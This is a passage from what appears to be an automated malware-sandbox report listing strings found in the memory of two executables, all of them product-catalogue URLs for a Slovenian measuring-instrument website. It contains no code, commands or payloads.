PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/katalogi-prospekti-brosure-dokumenti/kompletni-ka
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/katalogi-prospekti-brosure-dokumenti/prospekti-br
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/ir-termometri/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/merilnik-kvalitete-olja-
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-merilnik-vsebno
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-merilniki-ph/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-merilniki-prevo
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-termometri/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/prenosni-rocni-merilniki/prenosni-vlagomerji-higr
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/razdelitev-po-industrijskih-sektorjih/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/razdelitev-po-industrijskih-sektorjih/data-logger
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/ebro-xylem/razdelitev-po-industrijskih-sektorjih/zivilska-in
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/livarski-termomete
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/merilni-pretvornik
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/elpro-posebne-izvedbe-temperaturnih-tipal/profesionalni-seti
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, 